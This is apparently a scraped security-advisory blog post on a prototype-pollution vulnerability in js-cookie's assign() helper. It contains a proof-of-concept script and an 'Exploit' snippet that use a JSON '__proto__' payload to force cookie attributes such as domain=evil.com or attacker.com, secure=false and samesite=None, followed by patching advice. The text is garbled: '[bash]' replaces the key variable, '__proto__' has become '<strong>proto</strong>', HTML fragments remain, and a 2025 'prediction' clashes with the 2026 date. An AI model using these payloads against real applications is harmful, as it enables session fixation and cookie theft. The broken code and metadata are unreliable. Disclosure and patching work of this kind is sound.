Listen to this Post
How the CVE works:
The vulnerability resides in js-cookie’s internal `assign()` helper (src/assign.mjs). This function copies properties from source objects into a target object using a `for…in` loop and plain assignment (target
= source[bash]</code>). When the source object is generated via <code>JSON.parse()</code>, any `"__proto__"` key becomes an own enumerable property because JSON treats `__proto__` as a normal string key. The `for...in` loop enumerates this `"__proto__"` key, and the assignment triggers the `Object.prototype.__proto__` setter on the fresh target object (which is a plain <code>{}</code>). This per‑instance prototype hijack does not modify `Object.prototype` globally, but it makes the target object inherit attacker‑controlled properties. Later, js-cookie's `set()` function enumerates the merged attributes object with another `for...in` loop. Every key placed on the polluted prototype (e.g., <code>domain</code>, <code>secure</code>, <code>samesite</code>, <code>expires</code>, <code>path</code>) is then written into the final `Set-Cookie` string as an attribute pair. An attacker can thus override cookie attributes that the developer intended to lock down, such as forcing <code>domain=evil.com</code>, <code>secure=false</code>, or <code>samesite=None</code>, leading to cross‑site cookie injection or session fixation.
<h2 style="color: blue;">dailycve form:</h2>
Platform: js-cookie
Version: All vulnerable
Vulnerability : Prototype pollution
Severity: Medium
date: 2026-05-21
<h2 style="color: blue;">Prediction: 2025-01-15</h2>
<h2 style="color: blue;">Analytics under heading What Undercode Say:</h2>
[bash]
Environment setup and PoC execution
mkdir -p /tmp/jscookie-poc && cd /tmp/jscookie-poc
npm init -y
npm i js-cookie
PoC code (poc.mjs)
cat > poc.mjs << 'EOF'
let lastSetCookie = '';
globalThis.document = {
get cookie() { return ''; },
set cookie(v) { lastSetCookie = v; }
};
const { default: Cookies } = await import('js-cookie');
const attackerAttrs = JSON.parse(
'{"<strong>proto</strong>":{"secure":"false","domain":"evil.com","samesite":"None","expires":-1}}'
);
Cookies.set('session', 'TOKEN', attackerAttrs);
console.log('Set-Cookie that js-cookie wrote to document.cookie:');
console.log(lastSetCookie);
EOF
Run PoC
node poc.mjs
Exploit:
// Attacker-controlled JSON payload delivered via API response
const maliciousConfig = {
"<strong>proto</strong>": {
"domain": "attacker.com",
"secure": "false",
"samesite": "None",
"expires": -1,
"path": "/"
}
};
// When application passes this to Cookies.set() or Cookies.withAttributes()
Cookies.set("auth", "user_token", maliciousConfig);
// Resulting Set-Cookie: auth=user_token; domain=attacker.com; secure=false; samesite=None; path=/
Protection from this CVE
- Upgrade js-cookie to a patched version (≥3.0.5) once available.
- Apply the suggested patch to
assign.mjs: skip__proto__,constructor, and `prototype` keys; use `Object.defineProperty` instead of direct assignment. - Alternative one‑liner: replace `for...in` with `for (const key of Object.getOwnPropertyNames(source)) { if (key === '__proto__') continue; target[bash] = source[bash]; }`
- Avoid passing untrusted JSON objects directly as cookie attributes; sanitize or use `Object.create(null)` for configuration objects.
Impact
- Attackers can hijack cookie attributes, overwriting
domain,path,secure,samesite, andexpires. - Enables session fixation by moving cookies to attacker‑controlled domains.
- Circumvents security flags like `Secure` or
SameSite=Strict, leading to potential cookie exfiltration over plain HTTP. - Allows persistent cookies to be turned into session cookies (
expires=-1) or vice‑versa, breaking application logic.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

